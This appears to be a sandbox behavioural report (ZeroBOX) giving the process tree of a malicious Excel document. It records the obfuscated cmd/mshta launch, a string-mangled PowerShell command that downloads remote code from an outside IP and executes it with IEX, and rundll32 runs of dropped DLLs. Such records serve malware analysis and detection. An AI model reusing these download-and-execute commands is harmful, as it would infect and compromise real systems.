| ZeroBOX

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\905347967268907.xls
2360
- cmd.exe cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
  2628
  - mshta.exe mshta http://0xb907d607/fer/fer.html
    2704
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
      2844
      - cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
        2976
        
        rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
        3020
        
        rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
        3064
        
        rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qgnnnz\zltatffufq.gew",cnpNJTlXbqz
        2392
        
        rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qgnnnz\zltatffufq.gew",DllRegisterServer
        2664
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents